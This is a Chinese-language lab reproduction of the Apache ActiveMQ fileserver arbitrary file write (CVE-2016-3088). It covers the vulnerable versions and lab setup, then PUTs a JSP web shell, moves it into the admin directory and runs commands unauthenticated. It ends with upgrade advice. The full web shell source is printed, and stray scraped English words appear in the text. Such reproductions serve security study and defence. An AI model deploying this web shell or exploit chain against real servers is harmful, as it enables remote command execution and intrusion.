Apache ActiveMQ任意文件寫入漏洞(CVE-2016-3088)復現

Apache ActiveMQ任意文件寫入漏洞(CVE-2016-3088)復現html

1、漏洞描述java

該漏洞出如今fileserver應用中,漏洞原理:ActiveMQ中的fileserver服務容許用戶經過HTTP PUT方法上傳文件到指定目錄。Fileserver支持寫入文件(不解析jsp),可是支持移動文件(Move)咱們能夠將jsp的文件PUT到Fileserver下,而後再經過Move指令移動到可執行目錄下訪問。web

2、漏洞影響版本shell

Apache ActiveMQ 5.0.0 - 5.13.2apache

3、漏洞環境搭建瀏覽器

一、官網下載apache-activemq-5.7.0-bin.tar 下載地址:http://activemq.apache.org/download-archives.htmljsp

二、解壓 spa

三、啓動,進入bin目錄下,運行./activemq startcode

  

四、瀏覽器訪問http://192.168.10.149:8161/,以下圖能夠看到成功搭建環境server

  

4、漏洞復現

一、PUT上傳一個jsp的webshell到fileserver目錄,下圖能夠看到成功上傳jsp文件

Jsp文件內容:

<%@ page import="java.io.*"%>

<%

 out.print("Hello</br>");

 String strcmd=request.getParameter("cmd");

 String line=null;

 Process p=Runtime.getRuntime().exec(strcmd);

 BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));

 

 while((line=br.readLine())!=null){

  out.print(line+"</br>");

 }

%>

  

二、瀏覽器訪問http://192.168.10.149:8161/fileserver/1.jsp,下圖能夠看到fileserver目錄下的webshell沒有被解析,說明fileserver目錄沒有執行權限

  

三、利用該版本存在物理路徑泄露漏洞,爆一下絕對路徑

  

四、利用Move方法將webshell移入admin目錄下,以下圖所示成功把文件移入到admin目錄

  

五、利用該版本存在的未受權訪問漏洞,不用登陸,訪問http://192.168.10.149:8161/admin/1.jsp?cmd=ls,下圖能夠看到成功執行命令

  

5、漏洞防護

一、ActiveMQ Fileserver 的功能在 5.14.0 及其之後的版本中已被移除。建議用戶升級至 5.14.0 及其之後版本。

 

 ---------------------------------------------------------------------------------

參考: https://www.secpulse.com/archives/60064.html

相關文章
相關標籤/搜索